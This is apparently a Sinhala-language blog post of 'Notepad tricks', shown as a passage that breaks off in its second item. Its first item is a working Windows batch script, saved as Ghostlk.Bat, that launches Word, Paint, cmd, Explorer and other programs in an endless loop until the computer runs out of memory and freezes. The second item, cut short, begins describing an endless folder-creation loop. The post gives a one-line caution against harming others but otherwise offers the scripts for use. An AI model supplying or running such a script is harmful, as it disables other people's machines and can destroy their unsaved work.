Skip to main content

Posts

Showing posts from 2015

Notepad වැඩ ටිකක්.

Windows මෙහෙයුම් පද්දතියෙ තියන පහසු කමක් තමයි Notepad කියන්නෙ , හැමෝම දන්නව නොදන්න කෙනෙක් නැති තරම් . Notepad ගැන ඔයල මොනාද දන්නේ ? ඇත්තටම කරන්න පුලුවන් Type කරන එක විතරමද ? වෙන මොකුත්ම කරන්න බැරිද ? අද අපි දෙන්න යන්නෙ Notepad එක බාවිත කරල කරන්න පුලුවන් වැඩ ටිකක් .   අනුන්ට හානියක් කිරීමේ අරමුණින් මේවා කරන්න එපා . 01. පහල Code එකෙන් වෙන්නෙ ලියලා තියන වැඩ සටහන් නොනැවතී Open වෙන එකයි . මේකට ඔයලා තව කැමති ඒවා එකතු කරගන්න   පුලුවන් .Win Word,Paint,Notepad,Cmd,Explorer කියන ඇප්ලිකේශන් දිගින් දිගටම Open වෙන්න තමයි පහල කෝඩ් එක ලියල තියෙන්නෙ . අවසන් ප් ‍ රතිපලය පරිගනකයේ මතකයට මෙය දරා ගැනීමට නොහැකිව පරිගණකය හිර වීමක් තමයි සිද්ද වෙන්නෙ . Save කරන විට Save As ගිහින් Ghostlk.Bat කියල Save කරගන්න . Extension එක වෙන්නෙ .Bat @echo off :x start winword start mspaint start notepad start write start cmd start explorer start control start calc goto x  02. මෙතනදී සිදුවන්නේත් දිගින් දිගටම පෝල්ඩයරන් නිර්මානය වීමයි . අවසන් ප් ‍ රතිපලය පරිගනකයේ මතකයට මෙය දරා ගැනීමට නොහැකිව පරිගණකය